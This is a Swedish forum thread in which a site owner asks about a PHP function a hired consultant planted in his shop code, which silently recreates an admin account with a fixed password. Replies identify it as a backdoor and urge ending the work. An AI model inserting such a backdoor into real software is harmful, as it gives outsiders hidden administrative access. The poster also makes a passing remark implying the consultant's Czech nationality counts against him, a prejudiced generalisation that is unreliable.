Kom ihåg mig?
Home Menu

Menu


Hur skulle ni reagera om en konsult gjorde en sån här kod?

 
Ämnesverktyg Visningsalternativ
Oläst 2013-04-22, 16:38 #1
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
Standard Hur skulle ni reagera om en konsult gjorde en sån här kod?

Tjena.
Jag har för några dagar sen anlitat en konsult för att koda en sak till mig.
Han fick tillgång till mina filer (ftp) för att lättare kunna redigera allt, och när jag sedan såg en av filerna så fanns denna sträng:

Kod:
	public function hack() {
		$this->db->query("DELETE FROM " . DB_PREFIX . "user WHERE username = 'login'");
		$this->db->query("INSERT INTO " . DB_PREFIX . "user SET username = 'login', password = MD5('pass'), user_group_id = 1, status = 1");
	}
Hur skulle ni tolka detta?
Han säger att han gjorde detta för att inte behöva maila för admin login, men detta känns ganska skumt tycker jag..
xciso är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 16:42 #2
Wojt Wojt är inte uppkopplad
Bara ett inlägg till!
 
Reg.datum: Sep 2005
Inlägg: 1 524
Wojt Wojt är inte uppkopplad
Bara ett inlägg till!
 
Reg.datum: Sep 2005
Inlägg: 1 524
Haha.

Hade avbrutit samarbetet omgående.

Ger inte någon utvecklare tillgång till live-servrar, de måste lära sig jobba i en lokal miljö och sedan pusha kod till typ git. Ligger det då sådan kod för att få tillgång till livemiljön så kan de gå och jobba någon annanstans.
Wojt är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 16:48 #3
lunarmyss avatar
lunarmys lunarmys är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Apr 2006
Inlägg: 633
lunarmys lunarmys är inte uppkopplad
Mycket flitig postare
lunarmyss avatar
 
Reg.datum: Apr 2006
Inlägg: 633
Haha, humor!

Eller ja, idioti, men för oss utomstående så är det lite komiskt.
lunarmys är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 16:57 #4
Westmans avatar
Westman Westman är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Jun 2004
Inlägg: 4 021
Westman Westman är inte uppkopplad
Klarade millennium-buggen
Westmans avatar
 
Reg.datum: Jun 2004
Inlägg: 4 021
Avsluta samarbetet. Det där är så fel som det kan bli.
Westman är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 17:07 #5
gregoff gregoff är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jun 2010
Inlägg: 658
gregoff gregoff är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jun 2010
Inlägg: 658
Nu vet jag inte hur mycket programmering i PHP du kan, xciso, men vad koden gör är att nollställa lösenordet till användaren "login" med lösenordet "pass".

Med andra ord fanns det funktionalitet för att logga in i ditt system utan din vetskap även om du bytt lösenord... Rätt allvarligt övertramp!
gregoff är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 17:12 #6
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
Mitt system är av open-source, och detta gör mig lite rädd att det faktiskt var så enkelt.

Koden skapar ju först ett admin konto med användarnamn "login"

Jag håller på och sätter upp en ny version av sidan så jag har satt upp en VPS där jag gör allt och tanken var att sedan bara skifta ip så styrs min URL mot nya servern. På så sätt är det en "live" version..

Senast redigerad av xciso den 2013-04-22 klockan 17:16
xciso är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 17:41 #7
Jawns avatar
Jawn Jawn är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Aug 2004
Inlägg: 986
Jawn Jawn är inte uppkopplad
Mycket flitig postare
Jawns avatar
 
Reg.datum: Aug 2004
Inlägg: 986
Svårt att smyga med ett sådant namn på funktionen.
Jawn är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 17:45 #8
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
Konsulten tycker jag är paranoid, men jag ser mer som att han kan ligga och lura med koden i mitt system och om ett år gå in och ändra mitt tex paypal id till hans och på så sätt komma åt en bra summa då alla köp hamnar i hans plånbok..

Han har även utvecklat ett flertal moduler, och visst skulle ha då istället kunna implementera denna kod i alla moduler han säljer och utvecklar, men jag tycker ändå detta är skumt.
xciso är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 17:52 #9
Westmans avatar
Westman Westman är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Jun 2004
Inlägg: 4 021
Westman Westman är inte uppkopplad
Klarade millennium-buggen
Westmans avatar
 
Reg.datum: Jun 2004
Inlägg: 4 021
Nej du är inte paranoid. Det verkar som om konsulten anser att alla som inte är godtrogna är paranoida. I så fall är jag hellre paranoid.
Westman är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 17:55 #10
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
Då är vi 2
Dock lite tråkigt när jag tycker han verkat reko, och är billig.
Han är från Tjeckien, vilket kanske inte gör saken bättre.. Dock är priset på $20/h bra
xciso är inte uppkopplad   Svara med citatSvara med citat
Svara


Aktiva användare som för närvarande tittar på det här ämnet: 1 (0 medlemmar och 1 gäster)
 

Regler för att posta
Du får inte posta nya ämnen
Du får inte posta svar
Du får inte posta bifogade filer
Du får inte redigera dina inlägg

BB-kod är
Smilies är
[IMG]-kod är
HTML-kod är av

Forumhopp


Alla tider är GMT +2. Klockan är nu 14:41.

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson
 
Copyright © 2017